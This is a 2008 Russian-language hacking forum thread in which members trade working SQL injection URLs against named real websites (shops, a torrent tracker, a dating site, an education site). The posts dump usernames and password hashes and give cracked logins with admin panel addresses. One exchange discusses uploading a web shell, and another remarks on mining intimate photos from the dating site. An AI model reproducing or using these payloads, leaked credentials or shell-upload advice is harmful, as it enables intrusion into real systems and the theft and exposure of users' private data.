 |
|
12.06.2008, 16:00
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами:
10077446
Репутация:
3965
|
|
Сообщение от BlackSun
http://woonsanmall.com/shop/board/view.php?id=wdietinfo&ws=1&s=4_4&no=-1/**/union/**/select/**/0,1,2,name,password,5,6,7+from+gd_member/*
Дорк: inurl:"view.php?id=" inurl:"shop"
это не дорк. сайтов с такими урлами много 
__________________
BlackHat. MoDL
|
|
|
12.06.2008, 16:34
|
|
Познающий
Регистрация: 06.08.2007
Сообщений: 85
С нами:
9875274
Репутация:
91
|
|
Код:
http://proge.info/news/news.php?id=-1+union+select+1,2,user_password,username,5,6+from+users+limit+1,1/*
Могли бы хоть в библиотеке программистов не проглядеть это =\
====================================
Код:
http://www.zerecords.com/artists/artist.php?id=-19+union+select+1,login,passwd,4,5,6,7,8,9,10,11,12+from+user/*
Логин - admin, пароль - все остальное... Чет меня сначала смущала надпись сверху что я аж незаметил написанного чуть ниже 23...
Последний раз редактировалось SUBJECT617; 12.06.2008 в 17:55..
|
|
|
|
12.06.2008, 17:57
|
|
Познающий
Регистрация: 06.06.2007
Сообщений: 83
С нами:
9963383
Репутация:
140
|
|
Код:
http://torrentz.ru/search.php?kwds=ss'+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables/*&cat=0
|
|
|
|
12.06.2008, 18:09
|
|
Познающий
Регистрация: 06.08.2007
Сообщений: 85
С нами:
9875274
Репутация:
91
|
|
Код:
http://videoart.virtualmuseum.ca/artist.php?id=-13+union+select+1,username,user_password,user_email,5,6,7,8,9,10+from+drupal_DEV.bb_users+limit+0,1/*
About admin=) Красиво выдано.. Есть еще столбец user_icq. База кажется большая, я только непонял чо эт за сайт. Типа youtube вроде... |
|
|
|
12.06.2008, 19:13
|
|
Познающий
Регистрация: 06.06.2007
Сообщений: 83
С нами:
9963383
Репутация:
140
|
|
Код:
http://www.afrodita.ru/fastsearch.php?genderme=1&genderyouu=2&foto=1&intim=0&age1=&age2=0'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,concat_ws(char(58),login,passw),1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+from+USERS/*
красота 
большая база мыл.. если покапаться - можно найти интимные фотки |
|
|
|
12.06.2008, 19:35
|
|
Познающий
Регистрация: 06.08.2007
Сообщений: 85
С нами:
9875274
Репутация:
91
|
|
Код:
http://www.warconent.com/artist.php?id=-12+union+select+1,phpQid,passwd,4,5,6,7,8,9,10,11,12,13,14+from+phpqadmin/*
Почемуто столбца с username небыло... |
|
|
|
12.06.2008, 20:38
|
|
Познающий
Регистрация: 27.05.2008
Сообщений: 51
С нами:
9450895
Репутация:
41
|
|
http://psyedu.ru/rview.php?view=-1+union+select+1,2,login,user_password,5,6,7+from+ user/*
maxwell 1q2w3e
http://psyedu.ru/admin
Мона через создании статьи залить shell??? |
|
|
|
12.06.2008, 20:40
|
|
Участник форума
Регистрация: 08.02.2008
Сообщений: 116
С нами:
9607837
Репутация:
158
|
|
_http://www.bsigroup.ru/outgoing/news.php?id=0%27+union+select+1,2,3,4,5,6,7,8,conc at_ws(0x3a,_login_xz,_pass_xz),10+from+_system_use r/*
login  assword в MD5
salzman:gctdlj
svetlana:789258
два штуки удалось расшифровать
Последний раз редактировалось s_p_a_m; 12.06.2008 в 20:43..
|
|
|
|
12.06.2008, 20:50
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Сообщение от tor4)
http://psyedu.ru/rview.php?view=-1+union+select+1,2,login,user_password,5,6,7+from+ user/*
maxwell 1q2w3e
http://psyedu.ru/admin
Мона через создании статьи залить shell??? Можно,если админка php или ещё какая,но не html =_=.
Мне чето чаще попадаются именно хтмл =_=.Попробуй через аплоад(хотя врядли получицо).А вообще в каждой админке,если она не самописная,есь свои дыры =_=,а то придёццо искать исходники =________________=
Последний раз редактировалось Велемир; 12.06.2008 в 20:53..
|
|
|
|
12.06.2008, 21:33
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
С нами:
9457097
Репутация:
133
|
|
просто обыныя страница
Код:
http://hayam.spinners.ru/view_thisf.php?i=-681%20union%20select%201,version(),3,4/*
VER:4.0.27-max-log
DB:zagorsk5
DBUSER:zagorsk5@v16.valuehost.ru |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
